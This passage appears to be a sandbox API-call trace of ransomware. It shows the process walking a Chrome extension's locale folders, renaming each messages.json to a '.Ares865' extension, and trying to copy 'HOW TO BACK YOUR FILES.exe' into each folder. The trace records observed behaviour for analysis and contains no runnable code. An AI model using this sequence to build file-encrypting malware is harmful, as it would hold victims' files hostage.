Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.044] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=278) returned 1 [0103.047] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr" [0103.047] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr" [0103.047] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.048] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.048] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.048] GetLastError () returned 0x0 [0103.049] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ee5030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eda26c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eda26c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.049] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.049] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.Ares865") returned 161 [0103.049] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252) returned 1 [0103.054] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil" [0103.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil" [0103.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.055] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.055] GetLastError () returned 0x0 [0103.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ebeed0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4edee980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4edee980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.055] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.055] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.055] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.Ares865") returned 162 [0103.055] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0103.060] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi" [0103.060] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi" [0103.060] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.060] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.061] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.061] GetLastError () returned 0x0 [0103.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ebeed0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4edee980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4edee980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.062] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.062] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.062] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.Ares865") returned 161 [0103.062] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=257) returned 1 [0103.067] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu" [0103.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu" [0103.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.068] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.068] GetLastError () returned 0x0 [0103.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ebeed0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4edee980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4edee980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.069] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.069] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.Ares865") returned 161 [0103.069] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.071] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=243) returned 1 [0103.075] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et" [0103.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et" [0103.075] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.075] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.076] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.076] GetLastError () returned 0x0 [0103.076] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.076] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e98d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4edee980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4edee980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.076] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.076] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.Ares865") returned 161 [0103.077] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=251) returned 1 [0103.082] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419", iMaxLength=260 | out: 